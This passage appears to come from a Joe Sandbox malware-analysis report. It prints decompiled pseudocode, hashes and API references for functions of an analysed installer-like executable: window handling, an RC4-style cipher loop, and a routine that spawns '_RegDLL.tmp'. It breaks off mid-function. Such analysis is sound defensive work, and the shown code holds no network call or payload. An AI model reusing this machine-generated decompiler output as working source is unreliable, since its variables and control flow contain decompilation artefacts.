Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID:
API String ID: 568898626-0
Opcode ID: 1de80fc212659f48c3b882786dabb94969733f860b19e1fd336b33f5ef639fd7
Instruction ID: faa5eda2f2d0100deff86a1e04467dadc9dfb8972efa308103d054071ab7126a
Opcode Fuzzy Hash: 1de80fc212659f48c3b882786dabb94969733f860b19e1fd336b33f5ef639fd7
Instruction Fuzzy Hash: B6012131304108ABDB10EE69DCC1EEB77A8AF54364F254566FD09DF246E635DC8087A8

Uniqueness

Uniqueness Score: -1.00%

Function 00417580 Relevance: 3.0, APIs: 2, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417580(intOrPtr* __eax, void* __edx) {
				intOrPtr _t15;
				void* _t17;
				void* _t19;
				intOrPtr* _t20;
				void* _t27;

				_t27 = __edx;
				_t20 = __eax;
				if(( *(__edx + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(__edx + 8)) == 0x20 ||  *((short*)(__edx + 8)) == 0x2d || IsIconic( *(__eax + 0xc0)) != 0 || GetCapture() != 0) {
					L8:
					return  *((intOrPtr*)( *_t20 - 0x10))();
				}
				_t15 =  *0x49a628; // 0x2262410
				if(_t20 ==  *((intOrPtr*)(_t15 + 0x28))) {
					goto L8;
				}
				_t17 = E0041F65C(_t20);
				_t26 = _t17;
				if(_t17 == 0) {
					goto L8;
				}
				_t19 = E00415228(_t26, 0, 0xb017, _t27);
				if(_t19 == 0) {
					goto L8;
				}
				return _t19;
			}

0x00417583
0x00417585
0x00417594
0x004175e7
0x00000000
0x004175ed
0x004175bd
0x004175c5
0x00000000
0x00000000
0x004175c9
0x004175ce
0x004175d2
0x00000000
0x00000000
0x004175de
0x004175e5
0x00000000
0x00000000
0x004175f3

APIs

IsIconic.USER32 ref: 004175AB
GetCapture.USER32 ref: 004175B4

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CaptureIconic
String ID:
API String ID: 2277910766-0
Opcode ID: 9fa7ad8e735ab47da374aafe03c9a3e39808f5e3d417cf14708240a684c01214
Instruction ID: adf900500f1a92f4db3d9ed622088904c48d054dd6ffc893bbaea821dd9f99c1
Opcode Fuzzy Hash: 9fa7ad8e735ab47da374aafe03c9a3e39808f5e3d417cf14708240a684c01214
Instruction Fuzzy Hash: 2BF0447230460197D720972EC885AABA2F69F54358B14483FE419CBB65EF78DCC5C658

Uniqueness

Uniqueness Score: -1.00%

Function 0042417C Relevance: 3.0, APIs: 2, Instructions: 22
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042417C(void* __eax, void* __ecx) {
				int _t9;
				void* _t17;
				void* _t18;

				_t18 = __ecx;
				_t17 = __eax;
				_t9 = IsIconic( *(__eax + 0x20));
				_t21 = _t9;
				if(_t9 == 0) {
					E00423A6C(_t17, _t18);
					SetActiveWindow( *(_t17 + 0x20));
					_t9 = E00423634( *(_t17 + 0x20), 6, _t21);
					if( *((short*)(_t17 + 0xce)) != 0) {
						return  *((intOrPtr*)(_t17 + 0xcc))();
					}
				}
				return _t9;
			}

0x0042417c
0x0042417d
0x00424183
0x00424188
0x0042418a
0x0042418e
0x00424197
0x004241a4
0x004241b1
0x00000000
0x004241bb
0x004241b1
0x004241c2

APIs

IsIconic.USER32 ref: 00424183

Part of subcall function 00423A6C: EnumWindows.USER32(00423A04), ref: 00423A90
Part of subcall function 00423A6C: GetWindow.USER32(?,00000003), ref: 00423AA5
Part of subcall function 00423A6C: GetWindowLongA.USER32 ref: 00423AB4
Part of subcall function 00423A6C: SetWindowPos.USER32(00000000,DAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,00424193,?,?,00423D5B), ref: 00423AEA

SetActiveWindow.USER32(?,?,?,00423D5B,00000000,00424144), ref: 00424197

Part of subcall function 00423634: ShowWindow.USER32(00410638,00000009,?,00000000,0041ED8C,00423922,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042364F

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ActiveEnumIconicLongShowWindows
String ID:
API String ID: 2671590913-0
Opcode ID: 78ece0345a7cd31a22b2d760cecbaad42da577f57e993de622359aa812c494f0
Instruction ID: f72361d06d6ff6bb4de0be6d743e001fb5ac554c06dcc4dcc480d84dbee30593
Opcode Fuzzy Hash: 78ece0345a7cd31a22b2d760cecbaad42da577f57e993de622359aa812c494f0
Instruction Fuzzy Hash: 21E01A6130110087EF00AF69DCC8B9672A8BF58304F55057ABC48CF24BD67CC8508B24

Uniqueness

Uniqueness Score: -1.00%

Function 004125C0 Relevance: 1.7, APIs: 1, Instructions: 188
nativeCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004125C0(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr _v16;
				void* __edi;
				void* _t46;
				intOrPtr _t53;
				void* _t57;
				signed int _t60;
				void* _t68;
				signed int _t72;
				void* _t74;
				signed int _t78;
				intOrPtr _t82;
				intOrPtr _t87;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t125;
				signed int _t126;
				intOrPtr _t128;
				intOrPtr _t135;
				intOrPtr _t138;
				intOrPtr _t143;
				void* _t144;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				intOrPtr* _t149;
				intOrPtr _t151;

				_t149 = __edx;
				_v8 = __eax;
				_push(0x4127bd);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t151;
				_t46 =  *__edx - 0x53;
				if(_t46 == 0) {
					_v16 =  *((intOrPtr*)(__edx + 8));
					_t91 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t91;
					if(_t91 < 0) {
						L37:
						_push( *((intOrPtr*)(_t149 + 8)));
						_push( *(_t149 + 4));
						_push( *_t149);
						_t53 =  *((intOrPtr*)(_v8 + 0x10));
						L00405E1C();
						 *((intOrPtr*)(_t149 + 0xc)) = _t53;
						_t118 = _t53;
						 *[fs:eax] = _t118;
						return 0;
					}
					_t92 = _t91 + 1;
					_t145 = 0;
					__eflags = 0;
					while(1) {
						_t57 =  *((intOrPtr*)( *((intOrPtr*)(E0040B424(_v8, _t145))) + 0x2c))();
						_t121 = _v16;
						__eflags = _t57 -  *((intOrPtr*)(_t121 + 0xc));
						if(_t57 ==  *((intOrPtr*)(_t121 + 0xc))) {
							break;
						}
						_t145 = _t145 + 1;
						_t92 = _t92 - 1;
						__eflags = _t92;
						if(_t92 != 0) {
							continue;
						}
						goto L37;
					}
					E0040B424(_v8, _t145);
					_t60 = E00412200(1,  *((intOrPtr*)(_v16 + 8)));
					__eflags = _t60;
					if(_t60 == 0) {
						E0040B424(_v8, _t145);
						__eflags = 0;
						_t60 = E00412200(0,  *((intOrPtr*)(_v16 + 0xc)));
					}
					_t125 =  *0x49a62c; // 0x2260660
					_t126 =  *(_t125 + 0x40);
					__eflags = _t126;
					if(_t126 != 0) {
						__eflags =  *(_t126 + 0x110) & 0x00000008;
						if(( *(_t126 + 0x110) & 0x00000008) == 0) {
							E004248D4(_t60);
						} else {
							E004248E0();
						}
						_pop(_t128);
						 *[fs:eax] = _t128;
						return 0;
					} else {
						_pop( *[fs:0x0]);
						return _t60;
					}
				}
				_t68 = _t46 - 0xbe;
				if(_t68 == 0) {
					_t94 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t94;
					if(_t94 < 0) {
						goto L37;
					}
					_t95 = _t94 + 1;
					_t146 = 0;
					__eflags = 0;
					while(1) {
						E0040B424(_v8, _t146);
						_t72 = E00412234( *(_t149 + 4), __eflags);
						__eflags = _t72;
						if(_t72 != 0) {
							break;
						}
						_t146 = _t146 + 1;
						_t95 = _t95 - 1;
						__eflags = _t95;
						if(_t95 != 0) {
							continue;
						}
						goto L37;
					}
					_pop(_t135);
					 *[fs:eax] = _t135;
					return 0;
				}
				_t74 = _t68 - 6;
				if(_t74 == 0) {
					_t97 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t97;
					if(_t97 < 0) {
						goto L37;
					}
					_t98 = _t97 + 1;
					_t147 = 0;
					__eflags = 0;
					while(1) {
						E0040B424(_v8, _t147);
						_t78 = E00412250( *(_t149 + 4), __eflags);
						__eflags = _t78;
						if(_t78 != 0) {
							break;
						}
						_t147 = _t147 + 1;
						_t98 = _t98 - 1;
						__eflags = _t98;
						if(_t98 != 0) {
							continue;
						}
						goto L37;
					}
					_pop(_t138);
					 *[fs:eax] = _t138;
					return 0;
				}
				if(_t74 == 8) {
					_v9 = 0;
					__eflags =  *(__edx + 6) & 0x00000010;
					if(( *(__edx + 6) & 0x00000010) != 0) {
						_v9 = 1;
					}
					_t100 =  *((intOrPtr*)(_v8 + 8)) - 1;
					__eflags = _t100;
					if(__eflags < 0) {
						L24:
						_t82 =  *0x49a628; // 0x2262410
						E00424ADC(_t82, 0, _t144, __eflags);
						goto L37;
					} else {
						_t101 = _t100 + 1;
						_t148 = 0;
						__eflags = 0;
						while(1) {
							__eflags = E004121D0(E0040B424(_v8, _t148), _v9,  *(_t149 + 4) & 0x0000ffff);
							if(__eflags != 0) {
								break;
							}
							_t148 = _t148 + 1;
							_t101 = _t101 - 1;
							__eflags = _t101;
							if(__eflags != 0) {
								continue;
							}
							goto L24;
						}
						_t87 =  *0x49a628; // 0x2262410
						E00424ADC(_t87,  *((intOrPtr*)(_t86 + 0x38)), _t148, __eflags);
						_pop(_t143);
						 *[fs:eax] = _t143;
						return 0;
					}
				}
				goto L37;
			}

0x004125c9
0x004125cb
0x004125d1
0x004125d6
0x004125d9
0x004125de
0x004125e1
0x004126e6
0x004126ef
0x004126f0
0x004126f2
0x00412799
0x0041279c
0x004127a0
0x004127a3
0x004127a7
0x004127ab
0x004127b0
0x004127b5
0x004127b8
0x00000000
0x004127b8
0x004126f8
0x004126f9
0x004126f9
0x004126fb
0x00412707
0x0041270a
0x0041270d
0x00412710
0x00000000
0x00000000
0x00412791
0x00412792
0x00412792
0x00412793
0x00000000
0x00000000
0x00000000
0x00412793
0x00412717
0x00412725
0x0041272a
0x0041272c
0x00412733
0x0041273f
0x00412741
0x00412741
0x00412746
0x0041274c
0x0041274f
0x00412751
0x0041275f
0x00412766
0x00412782
0x00412768
0x00412774
0x00412774
0x00412789
0x0041278c
0x00000000
0x00412753
0x00412753
0x00000000
0x0041275a
0x00412751
0x004125e7
0x004125ec
0x00412607
0x00412608
0x0041260a
0x00000000
0x00000000
0x00412610
0x00412611
0x00412611
0x00412613
0x00412618
0x00412621
0x00412626
0x00412628
0x00000000
0x00000000
0x00412637
0x00412638
0x00412638
0x00412639
0x00000000
0x00000000
0x00000000
0x0041263b
0x0041262c
0x0041262f
0x00000000
0x0041262f
0x004125ee
0x004125f1
0x00412646
0x00412647
0x00412649
0x00000000
0x00000000
0x0041264f
0x00412650
0x00412650
0x00412652
0x00412657
0x0041265f
0x00412664
0x00412666
0x00000000
0x00000000
0x00412675
0x00412676
0x00412676
0x00412677
0x00000000
0x00000000
0x00000000
0x00412679
0x0041266a
0x0041266d
0x00000000
0x0041266d
0x004125f6
0x0041267e
0x00412682
0x00412686
0x00412688
0x00412688
0x00412692
0x00412693
0x00412695
0x004126d2
0x004126d4
0x004126d9
0x00000000
0x00412697
0x00412697
0x00412698
0x00412698
0x0041269a
0x004126b0
0x004126b2
0x00000000
0x00000000
0x004126ce
0x004126cf
0x004126cf
0x004126d0
0x00000000
0x00000000
0x00000000
0x004126d0
0x004126b7
0x004126bc
0x004126c3
0x004126c6
0x00000000
0x004126c6
0x00412695
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127BD), ref: 004127AB

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 6a4d6f569406c754de17483a25dbf391754f82b0155115fc65b172beaa3d303a
Instruction ID: 297e1b5ad5723169633700e987f27ec23561a0b219fe5327fd799413d7829d4a
Opcode Fuzzy Hash: 6a4d6f569406c754de17483a25dbf391754f82b0155115fc65b172beaa3d303a
Instruction Fuzzy Hash: E1512631204245CFDB14DB6AD680A9BF3E1EF94314B2482BBD854C37A1D7B8EDA1C748

Uniqueness

Uniqueness Score: -1.00%

Function 004771E0 Relevance: 1.6, APIs: 1, Instructions: 107
nativeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004771E0(intOrPtr __eax, signed int __edx) {
				intOrPtr* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t42;
				void* _t54;
				intOrPtr _t56;
				intOrPtr _t58;
				signed int _t60;
				signed int _t70;
				intOrPtr _t77;
				void* _t86;
				void* _t87;
				intOrPtr _t94;

				_v8 = __edx;
				_t42 =  *_v8 - 0x4a;
				if(_t42 == 0) {
					_push(0x477266);
					_push( *[fs:eax]);
					 *[fs:eax] = _t94;
					_t92 =  *((intOrPtr*)(_v8 + 8));
					_t90 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8))));
					if( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)))) + 0xb58c1640 - 2 < 0) {
						 *(_v8 + 0xc) = E00476F94(__eax, __eax, __edx & 0xffffff00 | _t90 == 0x4a73e9c1, _t90, _t92,  *((intOrPtr*)(_t92 + 4)));
					}
					_pop(_t77);
					 *[fs:eax] = _t77;
					return 0;
				}
				_t54 = _t42 - 0x44c;
				if(_t54 == 0) {
					_t56 =  *((intOrPtr*)(_v8 + 4));
					if(_t56 != 0x2710) {
						if(_t56 != 0x2711) {
							return _t56;
						}
						_t58 =  *((intOrPtr*)(_v8 + 8));
						 *((intOrPtr*)(__eax + 0x14)) = _t58;
						return _t58;
					}
					 *((char*)(__eax + 0x10)) = 1;
					return _t56;
				}
				if(_t54 != 0x14ba) {
					_push( *((intOrPtr*)(_v8 + 8)));
					_push( *((intOrPtr*)(_v8 + 4)));
					_push( *_v8);
					_t70 =  *(__eax + 4);
					_push(_t70);
					L00405E1C();
					 *(_v8 + 0xc) = _t70;
					return _t70;
				}
				_t60 = 0x6c840005;
				if( *((intOrPtr*)(_v8 + 8)) == ( *(__eax + 8) & 0x0000ffff)) {
					_t60 = 0x6c840006;
					_t86 =  *((intOrPtr*)(_v8 + 4)) - 1;
					if(_t86 == 0) {
						_t60 =  *(__eax + 0xa) & 0x0000ffff | 0x6c830000;
					} else {
						_t87 = _t86 - 1;
						if(_t87 == 0) {
							_t60 =  *(__eax + 0xc) & 0x0000ffff | 0x6c830000;
						} else {
							if(_t87 == 1) {
								_t60 =  *(__eax + 0xe) & 0x0000ffff | 0x6c830000;
							}
						}
					}
				}
				 *(_v8 + 0xc) = _t60;
				return _t60;
			}

0x004771e7
0x004771f1
0x004771f4
0x00477214
0x00477219
0x0047721c
0x00477222
0x00477225
0x00477231
0x00477256
0x00477256
0x0047725b
0x0047725e
0x00000000
0x0047725e
0x004771f6
0x004771fb
0x004772f1
0x004772f9
0x00477309
0x0047733e
0x0047733e
0x0047730e
0x00477311
0x00000000
0x00477311
0x004772fb
0x00000000
0x004772fb
0x00477206
0x0047731c
0x00477323
0x00477329
0x0047732a
0x0047732d
0x0047732e
0x00477336
0x00000000
0x00477336
0x0047729e
0x004772af
0x004772b1
0x004772bc
0x004772bd
0x004772cb
0x004772bf
0x004772bf
0x004772c0
0x004772d6
0x004772c2
0x004772c3
0x004772e1
0x004772e1
0x004772c3
0x004772c0
0x004772bd
0x004772e9
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0047732E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 00db6fdff46db94656172b0de1a0eb2c5b74125bd7b5d9b5ba8fecf8895d20cc
Instruction ID: 280af59a5ae85b10fa16546922e42e294d04fa874ca4da03d5a859b113da40c5
Opcode Fuzzy Hash: 00db6fdff46db94656172b0de1a0eb2c5b74125bd7b5d9b5ba8fecf8895d20cc
Instruction Fuzzy Hash: DF414A35608105DFDB10CF99D6848AAB7F5EB48314BB4C992F848DB702D338EE41EB98

Uniqueness

Uniqueness Score: -1.00%

Function 0045C5D8 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C5E3

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CryptFour
String ID:
API String ID: 2153018856-0
Opcode ID: 651b4255f8f37333a72078680a1a9bfcd58302e71283ab24fac16430b67eaead
Instruction ID: 942496f3e0ccd8558e6e5884e6bcc67e2df017c0953dea0fea9077157c5b02cc
Opcode Fuzzy Hash: 651b4255f8f37333a72078680a1a9bfcd58302e71283ab24fac16430b67eaead
Instruction Fuzzy Hash: DFC09BF240420C7F65005795FDC9C77B75CE65C6547404126F70442101D671BC1045B4

Uniqueness

Uniqueness Score: -1.00%

Function 0045C5F0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046C7B8,?,0046C999), ref: 0045C5F6

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CryptFour
String ID:
API String ID: 2153018856-0
Opcode ID: 98c8924454e5e0a025deeef397c00770e8839c4ae072c68cf218b48ce206c8d1
Instruction ID: fb6e3d17fc0ee7d65dc953bb745d1d81f690dcf2528c8641c692023e2af5ca27
Opcode Fuzzy Hash: 98c8924454e5e0a025deeef397c00770e8839c4ae072c68cf218b48ce206c8d1
Instruction Fuzzy Hash: 15A002F0F803007AFD2057616F0EF3B256CD7D4F01F2044697715A90D4C6A46404856C

Uniqueness

Uniqueness Score: -1.00%

Function 10001130 Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001130() {
				signed char _t24;
				signed char _t25;
				intOrPtr _t30;
				signed char _t34;
				intOrPtr _t35;
				char _t37;
				intOrPtr _t41;
				char* _t43;
				char* _t48;
				signed char* _t52;
				void* _t54;

				_t41 =  *((intOrPtr*)(_t54 + 4));
				_t35 =  *((intOrPtr*)(_t54 + 0x10));
				_t24 =  *((intOrPtr*)(_t41 + 0x101));
				_t34 =  *(_t41 + 0x100);
				if(_t35 <= 0) {
					 *(_t41 + 0x100) = _t34;
					 *((char*)(_t41 + 0x101)) = _t24;
					return _t24;
				} else {
					_t52 =  *(_t54 + 0x14);
					 *((intOrPtr*)(_t54 + 0x18)) =  *(_t54 + 0x14) - _t52;
					 *((intOrPtr*)(_t54 + 0x20)) = _t35;
					while(1) {
						_t34 = _t34 + 1;
						_t48 = (_t34 & 0x000000ff) + _t41;
						_t37 =  *_t48;
						_t25 = _t24 + _t37;
						 *(_t54 + 0x14) = _t25;
						_t43 = (_t25 & 0x000000ff) + _t41;
						 *_t48 =  *_t43;
						 *_t43 = _t37;
						if( *((intOrPtr*)(_t54 + 0x1c)) != 0) {
							 *_t52 =  *((0 + _t37 & 0x000000ff) + _t41) ^  *( *((intOrPtr*)(_t54 + 0x18)) + _t52);
						}
						_t52 =  &(_t52[1]);
						_t30 =  *((intOrPtr*)(_t54 + 0x20)) - 1;
						 *((intOrPtr*)(_t54 + 0x20)) = _t30;
						if(_t30 == 0) {
							break;
						}
						_t24 =  *(_t54 + 0x14);
					}
					 *(_t41 + 0x100) = _t34;
					 *((char*)(_t41 + 0x101)) =  *(_t54 + 0x14);
					return _t30;
				}
			}

0x10001130
0x10001134
0x1000113a
0x10001141
0x10001147
0x100011c1
0x100011c7
0x100011ce
0x10001149
0x1000114a
0x10001156
0x1000115a
0x10001164
0x10001164
0x10001169
0x1000116c
0x1000116e
0x10001170
0x10001177
0x1000117e
0x10001186
0x10001188
0x1000119b
0x1000119b
0x100011a2
0x100011a3
0x100011a4
0x100011a8
0x00000000
0x00000000
0x10001160
0x10001160
0x100011b1
0x100011b7
0x100011be
0x100011be

Memory Dump Source

Source File: 00000001.00000002.324799867.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.324794478.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.324805002.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 10001000 Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001000() {

				return 1;
			}

0x10001005

Memory Dump Source

Source File: 00000001.00000002.324799867.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.324794478.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.324805002.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00457190 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 237
filesynchronizationprocessCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00457190(void* __eax, void* __ebx, char __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v5;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _PROCESS_INFORMATION _v112;
				char _v116;
				char _v120;
				long _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _t103;
				CHAR* _t119;
				CHAR* _t121;
				char _t128;
				char _t132;
				void* _t151;
				void* _t175;
				void* _t198;
				intOrPtr _t200;
				void* _t201;
				void* _t203;
				void* _t216;
				void* _t217;
				void* _t219;
				void* _t220;
				intOrPtr _t221;

				_t214 = __edi;
				_t219 = _t220;
				_t221 = _t220 + 0xffffff78;
				_push(__edi);
				_v116 = 0;
				_v24 = 0;
				_v28 = 0;
				_v5 = __ecx;
				_t216 = __edx;
				_t175 = __eax;
				_push(_t219);
				_push(0x4574c5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t221;
				E00456B58("Spawning _RegDLL.tmp", __eax, __ecx, __edi, __edx);
				_v16 = 0;
				_v20 = 0;
				_v12 = CreateMutexA( &E00498AE4, 1, 0);
				if(_v12 == 0) {
					E004527FC("CreateMutex");
				}
				_push(_t219);
				_push(0x45749b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t221;
				_v16 = CreateFileMappingA(0xffffffff,  &E00498AE4, 4, 0, 0x2018, 0);
				if(_v16 == 0) {
					E004527FC("CreateFileMapping");
				}
				_v20 = MapViewOfFile(_v16, 2, 0, 0, 0x2018);
				if(_v20 == 0) {
					E004527FC("MapViewOfFile");
				}
				E00402934(_v20, 0x2018);
				 *_v20 = 3;
				 *(_v20 + 4) = 0x2018;
				 *((intOrPtr*)(_v20 + 0x10)) = 0;
				 *((intOrPtr*)(_v20 + 0x14)) = 0;
				E004073B0(_v20 + 0x18, 0xfff, _t216);
				if(ReleaseMutex(_v12) == 0) {
					E004527FC("ReleaseMutex");
				}
				_t103 =  *0x49b120; // 0x22900c8
				E0042C3E4(_t103,  &_v116);
				E004035C0( &_v24, "_isetup\\_RegDLL.tmp", _v116);
				_v132 = _v16;
				_v128 = 0;
				_v124 = _v12;
				_v120 = 0;
				E004078D4("_RegDLL.tmp %u %u", 1,  &_v132,  &_v28);
				E00402934( &_v96, 0x44);
				_v96.cb = 0x44;
				E0042D868( &_v116);
				_t119 = E00403738(_v116);
				_t121 = E00403738(_v28);
				if(CreateProcessA(E00403738(_v24), _t121, 0, 0, 1, 0x4000000, 0, _t119,  &_v96,  &_v112) == 0) {
					E004527FC("CreateProcess");
				}
				CloseHandle(_v112.hThread);
				_t128 = E00456E40( &_v112);
				if(_t128 != 0x1c9b28da) {
					_v140 = _t128;
					_v136 = 0;
					E00452700("REGDLL failed with exit code 0x%x", _t175, 0,  &_v140, _t214, _t216, 0);
				}
				_t217 = WaitForSingleObject(_v12, 0xffffffff);
				_t230 = _t217;
